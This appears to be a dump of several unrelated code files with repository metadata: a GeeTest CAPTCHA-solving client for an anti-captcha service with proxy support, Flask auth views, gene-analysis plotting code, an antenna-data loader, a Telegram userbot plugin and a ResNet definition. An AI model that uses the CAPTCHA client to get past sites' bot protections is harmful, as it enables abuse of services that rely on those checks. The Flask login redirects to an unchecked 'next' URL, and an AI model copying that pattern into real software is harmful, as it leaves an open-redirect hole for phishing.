class geetestProxyon(antiNetworking):
js_api_domain = ""
gt = ""
challenge = ""
geetest_lib = ""
async def solve_and_return_solution(self):
if (
await self.create_task(
{
"clientKey": self.client_key,
"task": {
"type": "GeeTestTask",
"websiteURL": self.website_url,
"gt": self.gt,
"challenge": self.challenge,
"geetestApiServerSubdomain": self.js_api_domain,
"geetestGetLib": self.geetest_lib,
"proxyType": self.proxy_type,
"proxyAddress": self.proxy_address,
"proxyPort": self.proxy_port,
"proxyLogin": self.proxy_login,
"proxyPassword": self.proxy_password,
"userAgent": self.user_agent,
},
}
)
== 1
):
self.log("created task with id " + str(self.task_id))
else:
self.log("could not create task")
self.log(self.err_string)
return 0
# checking result
await asyncio.sleep(3)
task_result = self.wait_for_result(600)
if task_result == 0:
return 0
else:
return task_result["solution"]
def set_gt_key(self, value):
self.gt = value
def set_challenge_key(self, value):
self.challenge = value
def set_js_api_domain(self, value):
self.js_api_domain = value
def set_geetest_lib(self, value):
self.geetest_lib = value
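# Minimal usage sketch (illustrative only; the attributes set below are the ones
# referenced inside solve_and_return_solution, and every value is a placeholder):
#
#   solver = geetestProxyon()
#   solver.client_key = "<anti-captcha API key>"
#   solver.website_url = "https://example.com/login"
#   solver.set_gt_key("<gt value scraped from the page>")
#   solver.set_challenge_key("<challenge value scraped from the page>")
#   solver.proxy_type, solver.proxy_address, solver.proxy_port = "http", "1.2.3.4", 8080
#   solver.proxy_login = solver.proxy_password = ""
#   solver.user_agent = "Mozilla/5.0"
#   solution = await solver.solve_and_return_solution()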
| 30.423729
| 72
| 0.494708
|
from aioanticaptcha.antinetworking import *
import asyncio
class geetestProxyon(antiNetworking):
js_api_domain = ""
gt = ""
challenge = ""
geetest_lib = ""
async def solve_and_return_solution(self):
if (
await self.create_task(
{
"clientKey": self.client_key,
"task": {
"type": "GeeTestTask",
"websiteURL": self.website_url,
"gt": self.gt,
"challenge": self.challenge,
"geetestApiServerSubdomain": self.js_api_domain,
"geetestGetLib": self.geetest_lib,
"proxyType": self.proxy_type,
"proxyAddress": self.proxy_address,
"proxyPort": self.proxy_port,
"proxyLogin": self.proxy_login,
"proxyPassword": self.proxy_password,
"userAgent": self.user_agent,
},
}
)
== 1
):
self.log("created task with id " + str(self.task_id))
else:
self.log("could not create task")
self.log(self.err_string)
return 0
await asyncio.sleep(3)
task_result = self.wait_for_result(600)
if task_result == 0:
return 0
else:
return task_result["solution"]
def set_gt_key(self, value):
self.gt = value
def set_challenge_key(self, value):
self.challenge = value
def set_js_api_domain(self, value):
self.js_api_domain = value
def set_geetest_lib(self, value):
self.geetest_lib = value
| true
| true
|
790b038deca2b72154b1317ed77167b94ea5b07b
| 1,373
|
py
|
Python
|
app/auth/views.py
|
mwerumuchai/jukebox
|
eb6e7e94fb4a228e3b66477ca2ed0fcbe4c44691
|
[
"MIT"
] | null | null | null |
app/auth/views.py
|
mwerumuchai/jukebox
|
eb6e7e94fb4a228e3b66477ca2ed0fcbe4c44691
|
[
"MIT"
] | null | null | null |
app/auth/views.py
|
mwerumuchai/jukebox
|
eb6e7e94fb4a228e3b66477ca2ed0fcbe4c44691
|
[
"MIT"
] | 2
|
2018-10-26T20:08:04.000Z
|
2020-07-23T22:08:43.000Z
|
from flask import render_template,redirect,url_for,request,flash
from . import auth
from ..models import Group
from .forms import RegistrationForm,LoginForm
from .. import db
from flask_login import login_user,logout_user,login_required
@auth.route('/login', methods=["GET", "POST"])
def login():
login_form = LoginForm()
if login_form.validate_on_submit():
group = Group.query.filter_by( name=login_form.name.data).first()
if group is not None and group.verify_password(login_form.password.data):
login_user(group, login_form.remember.data)
return redirect(request.args.get('next') or url_for('main.group', id=group.id))
flash('Invalid group name or password')
title="Login"
return render_template('auth/login.html', login_form=login_form, title=title)
@auth.route('/logout')
@login_required
def logout():
logout_user()
return redirect(url_for("main.index"))
@auth.route('/register', methods=["GET", "POST"])
def register():
form = RegistrationForm()
if form.validate_on_submit():
group = Group( name=form.name.data, password=form.password.data)
db.session.add(group)
db.session.commit()
return redirect(url_for('auth.login'))
title="New Account"
return render_template('auth/register.html', registration_form=form, title=title)
| 24.517857
| 91
| 0.697742
|
from flask import render_template,redirect,url_for,request,flash
from . import auth
from ..models import Group
from .forms import RegistrationForm,LoginForm
from .. import db
from flask_login import login_user,logout_user,login_required
@auth.route('/login', methods=["GET", "POST"])
def login():
login_form = LoginForm()
if login_form.validate_on_submit():
group = Group.query.filter_by( name=login_form.name.data).first()
if group is not None and group.verify_password(login_form.password.data):
login_user(group, login_form.remember.data)
return redirect(request.args.get('next') or url_for('main.group', id=group.id))
flash('Invalid group name or password')
title="Login"
return render_template('auth/login.html', login_form=login_form, title=title)
@auth.route('/logout')
@login_required
def logout():
logout_user()
return redirect(url_for("main.index"))
@auth.route('/register', methods=["GET", "POST"])
def register():
form = RegistrationForm()
if form.validate_on_submit():
group = Group( name=form.name.data, password=form.password.data)
db.session.add(group)
db.session.commit()
return redirect(url_for('auth.login'))
title="New Account"
return render_template('auth/register.html', registration_form=form, title=title)
| true
| true
|
790b052bd7820426511155774e42497715bf9ea3
| 9,377
|
py
|
Python
|
genecast_package/core.py
|
861934367/genecast
|
b4c5710aef526f4e3bdf0ba3594dab583068eca3
|
[
"Apache-2.0"
] | null | null | null |
genecast_package/core.py
|
861934367/genecast
|
b4c5710aef526f4e3bdf0ba3594dab583068eca3
|
[
"Apache-2.0"
] | null | null | null |
genecast_package/core.py
|
861934367/genecast
|
b4c5710aef526f4e3bdf0ba3594dab583068eca3
|
[
"Apache-2.0"
] | null | null | null |
## this tool is the core function of cnv and snv analysis
## author: taozhou
## email: zhou.tao@genecast.com.cn
import matplotlib as mpl
mpl.use('Agg')
import warnings
warnings.filterwarnings("ignore")
import itertools
import seaborn as sns
import matplotlib.pylab as plt
import matplotlib.colors as mc
from genecast_package.svm_analysis import feature_select, evaluate_model
from sklearn.decomposition import PCA
from collections import OrderedDict
from collections import defaultdict
import datetime
import pandas as pd
from scipy.stats import ranksums
import os
import sh
import warnings
warnings.filterwarnings("ignore")
def z_score(data, axis):
if axis == 3:
return data
if axis == 1:
z_scored = data
else:
z_scored = data.T
z_scored = (z_scored - z_scored.mean()) / z_scored.std()
if axis == 1:
return z_scored
else:
return z_scored.T
def pheatmap(data, length, col_cluster=True, xticklabels=True, yticklabels=True, color=None, name=None, args=None):
data = z_score(data, axis=args.z_score)
if len(data.columns) > 30:
xticklabels = False
if len(data) > 80:
yticklabels = False
vmin, vmax = data.unstack().quantile([.05, .95])
if args.z_score == 3:
vmin, vmax = 0, 4
    re = sns.clustermap(data, cmap=args.cmp, row_cluster=True, method=args.cluster_method, col_cluster=col_cluster, figsize=(13, 10), \
                   xticklabels=xticklabels, yticklabels=yticklabels, vmin=vmin, vmax=vmax, col_colors=color)
re.ax_heatmap.set_xticklabels(re.ax_heatmap.xaxis.get_majorticklabels(), rotation=90)
re.ax_heatmap.set_yticklabels(re.ax_heatmap.yaxis.get_majorticklabels(), rotation=0)
if col_cluster == False:
for group, number in length.items():
re.ax_col_colors.text((number[0] + number[1])/2 + 1.5 - len(group)/2, 1.2, group, size=30)
re.savefig(name + "." + args.save)
else:
re.savefig(name + "_col_cluster." + args.save)
plt.close()
def make_col_color_heatmap(group_dic, args=None):
common_color = ["blue", "red", "green", "grey"]
color = {}; length = {}
temp = 0
i = 0
for name, group in group_dic.items():
length[name] = [temp, temp + len(group)]
temp += len(group)
for sample in group:
color[sample] = common_color[i]
i += 1
    if args.ac and args.bc:
        # fix: group1/group2 were previously undefined here (NameError); use the two group names
        group1, group2 = list(group_dic.keys())[:2]
        color[group1] = args.ac
        color[group2] = args.bc
color = pd.Series(color)
color.name = "group"
return color, length
def pca(data, group_dic, n=None, args=None):
pca = PCA(n_components=2)
group = []
length = OrderedDict()
temp = 0
for name, g in group_dic.items():
length[name] = [temp, temp + len(g)]
temp += len(g)
group += g
data = data[group]
newData = pca.fit_transform(data.T)
colors = {}
colors1 = ["blue", "red", "green", 'turquoise', "grey"]
i = 0
for name, number in length.items():
colors[name] = colors1[i]
i += 1
    if args.ac and args.bc:
        # fix: group1/group2 were previously undefined here (NameError); use the two group names
        group1, group2 = list(group_dic.keys())[:2]
        colors[group1] = args.ac
        colors[group2] = args.bc
for name, number in length.items():
plt.scatter(newData[number[0]:number[1], 0], newData[number[0]:number[1], 1], label=name, color=colors[name])
plt.title("PCA analysis", size=20)
pc1 = 100*pca.explained_variance_ratio_[0]
pc2 = 100*pca.explained_variance_ratio_[1]
plt.xlabel("PC1(%.1f)" % pc1, size=15)
plt.ylabel("PC1(%.1f)" % pc2, size=15)
plt.legend()
plt.savefig("PCA_%s.png" % n)
plt.close()
def plot_box(data, which, outname, palette, regulation, group, args=None):
fig, ax1 = plt.subplots(figsize=(8,12))
box_data = defaultdict(list)
names = []
if which == "cnv":
how = "mean"
for name, g in group.items():
names.append(name)
box_data[name] = data[g]
else:
how = "sum"
for name, g in group.items():
names.append(name)
box_data[name] = data[g]
z, p = ranksums(box_data[names[0]], box_data[names[1]])
if p >= 0.05:
plt.close()
return
data.to_csv(outname + "_box_data_%s" % (regulation) + ".txt", sep="\t")
if args.ac and args.bc:
group1 = list(group.keys())[0]
group2 = list(group.keys())[1]
palette[group1] = args.ac
palette[group2] = args.bc
sns.boxplot(data=pd.DataFrame(box_data), ax=ax1, width=0.2, linewidth=.5, palette=palette)
ax1.set_title("Difference of %s (p = %f)" % (which, p), size=30)
ax1.set_ylabel('%s value' % (which), size=30)
fig.autofmt_xdate(ha='center', rotation=0)
plt.xticks(rotation=0, size=30)
plt.legend()
fig.savefig(r'%s_box_data_%s_%s_Boxplot.%s' % (outname, regulation, how, args.save), dpi=600, size=0.5)
plt.close()
def databox(raw, which, outname=None, group=None, args=None):
palette_up = {}; palette_down = {}
up = []; down = []
group1_data = raw[list(group.values())[0]]; group1 = list(group.keys())[0]
group2_data = raw[list(group.values())[1]]; group2 = list(group.keys())[1]
for gene in raw.index:
if group1_data.ix[gene].sum() - group2_data.ix[gene].sum() >= 0:
up.append(gene); palette_up[group1] = "red"; palette_up[group2] = "blue"
else:
down.append(gene); palette_down[group1] = "blue"; palette_down[group2] = "red"
if len(palette_up) > 0:
for i in up:
plot_box(raw.ix[i], which, i, palette_up, "up", group, args=args)
if len(palette_down) > 0:
for i in down:
plot_box(raw.ix[i], which, i, palette_down, "down", group, args=args)
def save_data_pdf(data, name, length, color, group_dic, which, args=None):
data.to_csv("%s.txt" % name, sep="\t")
length = {key.split("/")[-1]: value for key, value in length.items()}
group_dic = {key.split("/")[-1]: value for key, value in group_dic.items()}
try:
pheatmap(data, length, col_cluster=True, color=color, name=name, args=args)
pheatmap(data, length, col_cluster=False, color=color, name=name, args=args)
except MemoryError:
print("you gene need too much MemoryError and i, so pass and do next")
pca(data, group_dic, n=name, args=args)
databox(data, which, outname=name, group=group_dic, args=args)
def save_parameters(args=None):
f = open("parameters.txt", "w")
for arg in dir(args):
if not arg.startswith("_"):
f.write(arg + ": " + str(getattr(args, arg)) + "\n")
f.close()
def make_result_folder(args=None, which="cnv", fun=None):
feature_genes = []; gene_lists = {}; color_length = {}
os.chdir(args.outdir)
i = datetime.datetime.now()
# for two_group in itertools.combinations([args.group1, args.group2], 2):
two_group = [args.group1[0].split("/")[-2], args.group2[0].split("/")[-2]]
target = args.group1[0].split("/")[-2] + "_VS_" + args.group2[0].split("/")[-2] + "_%s%s%s_%s%s" % (i.year, i.month, i.day, i.hour, i.minute)
try:
os.mkdir(target)
except FileExistsError:
sh.rm("-rf",target)
os.mkdir(target)
if which == "cnv":
name = "cnv_median_" + args.data_type
gene_list, a_group, b_group = fun(args=args)
else:
if args.cal_type == "num":
name = "snv_number"
else:
name = "snv_mean"
gene_list, a_group, b_group = fun(args=args)
# feature_gene = feature_select(gene_list, a_group, b_group, pval=args.pval, method=args.feature_selection_method,\
# criterion=args.criterion, penalty=args.penalty, C=args.C, threshold=args.threshold)
feature_gene = feature_select(gene_list, a_group, b_group, args=args)
feature_genes.append(feature_gene)
gene_lists[two_group[0]] = gene_list[a_group]; gene_lists[two_group[1]] = gene_list[b_group]
os.chdir(target)
save_parameters(args=args)
group_dic = {two_group[0]: a_group, two_group[1]: b_group}
color_length[two_group[0]] = a_group; color_length[two_group[1]] = b_group
color, length = make_col_color_heatmap(group_dic, args=args)
save_data_pdf(gene_list, "host_gene_%s" % name, length, color, group_dic, which, args=args)
pd.DataFrame({"gene":feature_gene}).to_csv("feature_gene_pval%0.2f.txt" % args.pval, sep="\t", index=False)
feature_gene_cnv = gene_list.ix[feature_gene]
evaluate_model(gene_list, a_group, b_group, feature_gene, name="feature_gene_%s" % name, args=args)
save_data_pdf(feature_gene_cnv, "feature_gene_%s" % name, length, color, group_dic, which, args=args)
os.chdir(args.outdir)
# if len(args.group1 + args.group2) > 2:
# try:
# os.mkdir("intersection")
# except FileExistsError:
# pass
# os.chdir("intersection")
# color, length = make_col_color_heatmap(color_length)
# intersection_feature_gene = list(set(feature_genes[0]).intersection(*feature_genes[1:]))
# intersection_feature_gene_cnv = pd.concat([data.ix[intersection_feature_gene] for [args.group1, args.group2], data in gene_lists.items()], axis=1)
# try:
# save_data_pdf(intersection_feature_gene_cnv, "intersection", length, color, color_length)
# except Exception:
# print("no intersection\njob finish...")
# os.chdir(args.outdir)
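As a quick reference, a toy illustration of the z_score helper defined at the top of this module (the DataFrame values are invented):
import pandas as pd
toy = pd.DataFrame({"s1": [1.0, 2.0, 3.0], "s2": [2.0, 6.0, 10.0]},
                   index=["geneA", "geneB", "geneC"])
z_score(toy, axis=1)   # each sample (column) scaled to mean 0, std 1
z_score(toy, axis=0)   # transposed internally, so each gene (row) is scaled instead
z_score(toy, axis=3)   # returned unchanged (pairs with the fixed vmin/vmax of 0..4)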
| 39.23431
| 156
| 0.630266
|
import matplotlib as mpl
mpl.use('Agg')
import warnings
warnings.filterwarnings("ignore")
import itertools
import seaborn as sns
import matplotlib.pylab as plt
import matplotlib.colors as mc
from genecast_package.svm_analysis import feature_select, evaluate_model
from sklearn.decomposition import PCA
from collections import OrderedDict
from collections import defaultdict
import datetime
import pandas as pd
from scipy.stats import ranksums
import os
import sh
import warnings
warnings.filterwarnings("ignore")
def z_score(data, axis):
if axis == 3:
return data
if axis == 1:
z_scored = data
else:
z_scored = data.T
z_scored = (z_scored - z_scored.mean()) / z_scored.std()
if axis == 1:
return z_scored
else:
return z_scored.T
def pheatmap(data, length, col_cluster=True, xticklabels=True, yticklabels=True, color=None, name=None, args=None):
data = z_score(data, axis=args.z_score)
if len(data.columns) > 30:
xticklabels = False
if len(data) > 80:
yticklabels = False
vmin, vmax = data.unstack().quantile([.05, .95])
if args.z_score == 3:
vmin, vmax = 0, 4
    re = sns.clustermap(data, cmap=args.cmp, row_cluster=True, method=args.cluster_method, col_cluster=col_cluster, figsize=(13, 10), \
                   xticklabels=xticklabels, yticklabels=yticklabels, vmin=vmin, vmax=vmax, col_colors=color)
re.ax_heatmap.set_xticklabels(re.ax_heatmap.xaxis.get_majorticklabels(), rotation=90)
re.ax_heatmap.set_yticklabels(re.ax_heatmap.yaxis.get_majorticklabels(), rotation=0)
if col_cluster == False:
for group, number in length.items():
re.ax_col_colors.text((number[0] + number[1])/2 + 1.5 - len(group)/2, 1.2, group, size=30)
re.savefig(name + "." + args.save)
else:
re.savefig(name + "_col_cluster." + args.save)
plt.close()
def make_col_color_heatmap(group_dic, args=None):
common_color = ["blue", "red", "green", "grey"]
color = {}; length = {}
temp = 0
i = 0
for name, group in group_dic.items():
length[name] = [temp, temp + len(group)]
temp += len(group)
for sample in group:
color[sample] = common_color[i]
i += 1
    if args.ac and args.bc:
        group1, group2 = list(group_dic.keys())[:2]
        color[group1] = args.ac
        color[group2] = args.bc
color = pd.Series(color)
color.name = "group"
return color, length
def pca(data, group_dic, n=None, args=None):
pca = PCA(n_components=2)
group = []
length = OrderedDict()
temp = 0
for name, g in group_dic.items():
length[name] = [temp, temp + len(g)]
temp += len(g)
group += g
data = data[group]
newData = pca.fit_transform(data.T)
colors = {}
colors1 = ["blue", "red", "green", 'turquoise', "grey"]
i = 0
for name, number in length.items():
colors[name] = colors1[i]
i += 1
    if args.ac and args.bc:
        group1, group2 = list(group_dic.keys())[:2]
        colors[group1] = args.ac
        colors[group2] = args.bc
for name, number in length.items():
plt.scatter(newData[number[0]:number[1], 0], newData[number[0]:number[1], 1], label=name, color=colors[name])
plt.title("PCA analysis", size=20)
pc1 = 100*pca.explained_variance_ratio_[0]
pc2 = 100*pca.explained_variance_ratio_[1]
plt.xlabel("PC1(%.1f)" % pc1, size=15)
plt.ylabel("PC1(%.1f)" % pc2, size=15)
plt.legend()
plt.savefig("PCA_%s.png" % n)
plt.close()
def plot_box(data, which, outname, palette, regulation, group, args=None):
fig, ax1 = plt.subplots(figsize=(8,12))
box_data = defaultdict(list)
names = []
if which == "cnv":
how = "mean"
for name, g in group.items():
names.append(name)
box_data[name] = data[g]
else:
how = "sum"
for name, g in group.items():
names.append(name)
box_data[name] = data[g]
z, p = ranksums(box_data[names[0]], box_data[names[1]])
if p >= 0.05:
plt.close()
return
data.to_csv(outname + "_box_data_%s" % (regulation) + ".txt", sep="\t")
if args.ac and args.bc:
group1 = list(group.keys())[0]
group2 = list(group.keys())[1]
palette[group1] = args.ac
palette[group2] = args.bc
sns.boxplot(data=pd.DataFrame(box_data), ax=ax1, width=0.2, linewidth=.5, palette=palette)
ax1.set_title("Difference of %s (p = %f)" % (which, p), size=30)
ax1.set_ylabel('%s value' % (which), size=30)
fig.autofmt_xdate(ha='center', rotation=0)
plt.xticks(rotation=0, size=30)
plt.legend()
fig.savefig(r'%s_box_data_%s_%s_Boxplot.%s' % (outname, regulation, how, args.save), dpi=600, size=0.5)
plt.close()
def databox(raw, which, outname=None, group=None, args=None):
palette_up = {}; palette_down = {}
up = []; down = []
group1_data = raw[list(group.values())[0]]; group1 = list(group.keys())[0]
group2_data = raw[list(group.values())[1]]; group2 = list(group.keys())[1]
for gene in raw.index:
if group1_data.ix[gene].sum() - group2_data.ix[gene].sum() >= 0:
up.append(gene); palette_up[group1] = "red"; palette_up[group2] = "blue"
else:
down.append(gene); palette_down[group1] = "blue"; palette_down[group2] = "red"
if len(palette_up) > 0:
for i in up:
plot_box(raw.ix[i], which, i, palette_up, "up", group, args=args)
if len(palette_down) > 0:
for i in down:
plot_box(raw.ix[i], which, i, palette_down, "down", group, args=args)
def save_data_pdf(data, name, length, color, group_dic, which, args=None):
data.to_csv("%s.txt" % name, sep="\t")
length = {key.split("/")[-1]: value for key, value in length.items()}
group_dic = {key.split("/")[-1]: value for key, value in group_dic.items()}
try:
pheatmap(data, length, col_cluster=True, color=color, name=name, args=args)
pheatmap(data, length, col_cluster=False, color=color, name=name, args=args)
except MemoryError:
print("you gene need too much MemoryError and i, so pass and do next")
pca(data, group_dic, n=name, args=args)
databox(data, which, outname=name, group=group_dic, args=args)
def save_parameters(args=None):
f = open("parameters.txt", "w")
for arg in dir(args):
if not arg.startswith("_"):
f.write(arg + ": " + str(getattr(args, arg)) + "\n")
f.close()
def make_result_folder(args=None, which="cnv", fun=None):
feature_genes = []; gene_lists = {}; color_length = {}
os.chdir(args.outdir)
i = datetime.datetime.now()
two_group = [args.group1[0].split("/")[-2], args.group2[0].split("/")[-2]]
target = args.group1[0].split("/")[-2] + "_VS_" + args.group2[0].split("/")[-2] + "_%s%s%s_%s%s" % (i.year, i.month, i.day, i.hour, i.minute)
try:
os.mkdir(target)
except FileExistsError:
sh.rm("-rf",target)
os.mkdir(target)
if which == "cnv":
name = "cnv_median_" + args.data_type
gene_list, a_group, b_group = fun(args=args)
else:
if args.cal_type == "num":
name = "snv_number"
else:
name = "snv_mean"
gene_list, a_group, b_group = fun(args=args)
feature_gene = feature_select(gene_list, a_group, b_group, args=args)
feature_genes.append(feature_gene)
gene_lists[two_group[0]] = gene_list[a_group]; gene_lists[two_group[1]] = gene_list[b_group]
os.chdir(target)
save_parameters(args=args)
group_dic = {two_group[0]: a_group, two_group[1]: b_group}
color_length[two_group[0]] = a_group; color_length[two_group[1]] = b_group
color, length = make_col_color_heatmap(group_dic, args=args)
save_data_pdf(gene_list, "host_gene_%s" % name, length, color, group_dic, which, args=args)
pd.DataFrame({"gene":feature_gene}).to_csv("feature_gene_pval%0.2f.txt" % args.pval, sep="\t", index=False)
feature_gene_cnv = gene_list.ix[feature_gene]
evaluate_model(gene_list, a_group, b_group, feature_gene, name="feature_gene_%s" % name, args=args)
save_data_pdf(feature_gene_cnv, "feature_gene_%s" % name, length, color, group_dic, which, args=args)
os.chdir(args.outdir)
| true
| true
|
790b0587c2415c64ec38f584c0c79b320ea5c5f0
| 500
|
py
|
Python
|
mnc/lwa_hiplot.py
|
jaycedowell/mnc_python
|
bc378ccc9a6cfaf76691122f072366b13e6ef092
|
[
"BSD-3-Clause"
] | 2
|
2021-08-12T18:18:11.000Z
|
2021-12-02T07:58:51.000Z
|
mnc/lwa_hiplot.py
|
jaycedowell/mnc_python
|
bc378ccc9a6cfaf76691122f072366b13e6ef092
|
[
"BSD-3-Clause"
] | 1
|
2021-12-15T18:51:14.000Z
|
2021-12-15T18:51:14.000Z
|
mnc/lwa_hiplot.py
|
jaycedowell/mnc_python
|
bc378ccc9a6cfaf76691122f072366b13e6ef092
|
[
"BSD-3-Clause"
] | 1
|
2021-12-03T15:05:00.000Z
|
2021-12-03T15:05:00.000Z
|
import hiplot
import lwa_antpos
def get_exp(uri):
df = lwa_antpos.lwa_df.reset_index()
df.drop(0, inplace=True) # remove antnum=0
df.antname = df.antname.apply(lambda x: int(x.split('-')[1]))
df.rename(columns={'antname': 'antnum'}, inplace=True)
df = df[['antnum', 'pola_fee', 'polb_fee', 'arx_address', 'pola_arx_channel', 'polb_arx_channel', 'snap2_hostname',
'pola_digitizer_channel', 'polb_digitizer_channel']]
return hiplot.Experiment.from_dataframe(df)
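One way to exercise this fetcher outside of the hiplot server (the output filename is arbitrary; Experiment.to_html is part of hiplot's public API):
exp = get_exp(None)              # the uri argument is accepted but unused here
exp.to_html("lwa_antpos.html")   # write an interactive parallel-coordinates page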
| 38.461538
| 119
| 0.69
|
import hiplot
import lwa_antpos
def get_exp(uri):
df = lwa_antpos.lwa_df.reset_index()
df.drop(0, inplace=True)
df.antname = df.antname.apply(lambda x: int(x.split('-')[1]))
df.rename(columns={'antname': 'antnum'}, inplace=True)
df = df[['antnum', 'pola_fee', 'polb_fee', 'arx_address', 'pola_arx_channel', 'polb_arx_channel', 'snap2_hostname',
'pola_digitizer_channel', 'polb_digitizer_channel']]
return hiplot.Experiment.from_dataframe(df)
| true
| true
|
790b05ca0e0c618bfe1b0827b220b95931031312
| 1,092
|
py
|
Python
|
plugins/user.py
|
fosslife/grambot
|
fbec1a8df939823b18915d4689e9da6f5adb871b
|
[
"MIT"
] | 7
|
2020-05-28T04:08:02.000Z
|
2022-02-22T18:11:03.000Z
|
plugins/user.py
|
fosslife/grambot
|
fbec1a8df939823b18915d4689e9da6f5adb871b
|
[
"MIT"
] | 1
|
2021-07-28T10:12:25.000Z
|
2021-12-13T15:09:43.000Z
|
plugins/user.py
|
fosslife/grambot
|
fbec1a8df939823b18915d4689e9da6f5adb871b
|
[
"MIT"
] | 4
|
2020-03-30T18:27:08.000Z
|
2022-02-25T16:28:06.000Z
|
from userbot import bot, logger
from telethon import TelegramClient, events
from config import user
from telethon.tl.functions.users import GetFullUserRequest
@bot.on(events.NewMessage(**user))
async def getUser(event):
logger.info("user plugin is called")
pattern_string = event.pattern_match.string
entity = pattern_string[pattern_string.find("(")+1:pattern_string.find(")")]
logger.info(f"entity to search - {entity}")
try:
info = await bot(GetFullUserRequest(entity))
await event.respond(f"""
Username - `{info.user.username}`
{"User is a bot" if info.user.bot else "user is not a bot"}
{"User is restricted for " + info.user.restriction_reason if info.user.restricted else "User is not restricted"}
Name - {info.user.first_name} {info.user.last_name if info.user.last_name else ""}
Status - `{info.about}`
id - {info.user.id}
{info.common_chats_count} groups common with me
{"I have blocked this user" if info.blocked else "I have not blocked this user"}
""")
except Exception:
await event.respond(f"Cannot find entity with `{entity}`")
| 42
| 113
| 0.725275
|
from userbot import bot, logger
from telethon import TelegramClient, events
from config import user
from telethon.tl.functions.users import GetFullUserRequest
@bot.on(events.NewMessage(**user))
async def getUser(event):
logger.info("user plugin is called")
pattern_string = event.pattern_match.string
entity = pattern_string[pattern_string.find("(")+1:pattern_string.find(")")]
logger.info(f"entity to search - {entity}")
try:
info = await bot(GetFullUserRequest(entity))
await event.respond(f"""
Username - `{info.user.username}`
{"User is a bot" if info.user.bot else "user is not a bot"}
{"User is restricted for " + info.user.restriction_reason if info.user.restricted else "User is not restricted"}
Name - {info.user.first_name} {info.user.last_name if info.user.last_name else ""}
Status - `{info.about}`
id - {info.user.id}
{info.common_chats_count} groups common with me
{"I have blocked this user" if info.blocked else "I have not blocked this user"}
""")
except Exception:
await event.respond(f"Cannot find entity with `{entity}`")
| true
| true
|
790b0642bc651ce6634c07feaef088b93a3e0de0
| 9,643
|
py
|
Python
|
models/official/detection/modeling/architecture/resnet.py
|
hoangphucITJP/tpu
|
e4ce0d8eb61a828d4b5fe09effd082356e88545c
|
[
"Apache-2.0"
] | null | null | null |
models/official/detection/modeling/architecture/resnet.py
|
hoangphucITJP/tpu
|
e4ce0d8eb61a828d4b5fe09effd082356e88545c
|
[
"Apache-2.0"
] | null | null | null |
models/official/detection/modeling/architecture/resnet.py
|
hoangphucITJP/tpu
|
e4ce0d8eb61a828d4b5fe09effd082356e88545c
|
[
"Apache-2.0"
] | null | null | null |
# Lint as: python2, python3
# Copyright 2019 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Contains definitions for the post-activation form of Residual Networks.
Residual networks (ResNets) were proposed in:
[1] Kaiming He, Xiangyu Zhang, Shaoqing Ren, Jian Sun
Deep Residual Learning for Image Recognition. arXiv:1512.03385
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from six.moves import range
import tensorflow.compat.v1 as tf
from modeling.architecture import nn_blocks
from modeling.architecture import nn_ops
def get_drop_connect_rate(init_rate, block_num, total_blocks):
"""Get drop connect rate for the ith block."""
if init_rate is not None:
return init_rate * float(block_num) / total_blocks
else:
return None
def block_group(inputs,
filters,
strides,
use_projection,
block_fn,
block_repeats,
batch_norm_relu=nn_ops.BatchNormRelu(),
dropblock=nn_ops.Dropblock(),
drop_connect_rate=None,
data_format='channels_last',
name=None,
is_training=False):
"""Builds one group of blocks.
Args:
inputs: a `Tensor` of size `[batch, channels, height, width]`.
filters: an `int` number of filters for the first two convolutions.
strides: an `int` block stride. If greater than 1, this block will
ultimately downsample the input.
use_projection: a `bool` for whether this block should use a projection
shortcut (versus the default identity shortcut). This is usually `True`
for the first block of a block group, which may change the number of
filters and the resolution.
block_fn: the `function` for the block to use within the model
block_repeats: an `int` number of blocks to repeat in the group.
batch_norm_relu: an operation that is added after convolutions, including a
batch norm layer and an optional relu activation.
    dropblock: a drop block layer that is added after convolutions. Note that
the default implementation does not apply any drop block.
drop_connect_rate: a 'float' number that specifies the drop connection rate
of the block. Note that the default `None` means no drop connection is
applied.
data_format: a `str` that specifies the data format.
name: a `str` name for the Tensor output of the block layer.
is_training: a `bool` if True, the model is in training mode.
Returns:
The output `Tensor` of the block layer.
"""
# Only the first block per block_group uses projection shortcut and strides.
inputs = block_fn(
inputs,
filters,
strides,
use_projection=use_projection,
batch_norm_relu=batch_norm_relu,
dropblock=dropblock,
drop_connect_rate=drop_connect_rate,
data_format=data_format,
is_training=is_training)
for _ in range(1, block_repeats):
inputs = block_fn(
inputs,
filters,
1,
use_projection=False,
batch_norm_relu=batch_norm_relu,
dropblock=dropblock,
drop_connect_rate=drop_connect_rate,
data_format=data_format,
is_training=is_training)
return tf.identity(inputs, name)
class Resnet(object):
"""Class to build ResNet family model."""
def __init__(self,
resnet_depth,
dropblock=nn_ops.Dropblock(),
batch_norm_relu=nn_ops.BatchNormRelu(),
init_drop_connect_rate=None,
data_format='channels_last'):
"""ResNet initialization function.
Args:
resnet_depth: `int` depth of ResNet backbone model.
dropblock: a dropblock layer.
batch_norm_relu: an operation that includes a batch normalization layer
followed by a relu layer(optional).
init_drop_connect_rate: a 'float' number that specifies the initial drop
connection rate. Note that the default `None` means no drop connection
is applied.
data_format: `str` either "channels_first" for `[batch, channels, height,
width]` or "channels_last for `[batch, height, width, channels]`.
"""
self._resnet_depth = resnet_depth
self._dropblock = dropblock
self._batch_norm_relu = batch_norm_relu
self._init_drop_connect_rate = init_drop_connect_rate
self._data_format = data_format
model_params = {
10: {'block': nn_blocks.residual_block, 'layers': [1, 1, 1, 1]},
18: {'block': nn_blocks.residual_block, 'layers': [2, 2, 2, 2]},
34: {'block': nn_blocks.residual_block, 'layers': [3, 4, 6, 3]},
50: {'block': nn_blocks.bottleneck_block, 'layers': [3, 4, 6, 3]},
101: {'block': nn_blocks.bottleneck_block, 'layers': [3, 4, 23, 3]},
152: {'block': nn_blocks.bottleneck_block, 'layers': [3, 8, 36, 3]},
200: {'block': nn_blocks.bottleneck_block, 'layers': [3, 24, 36, 3]}
}
if resnet_depth not in model_params:
valid_resnet_depths = ', '.join(
[str(depth) for depth in sorted(model_params.keys())])
raise ValueError(
'The resnet_depth should be in [%s]. Not a valid resnet_depth:'%(
valid_resnet_depths), self._resnet_depth)
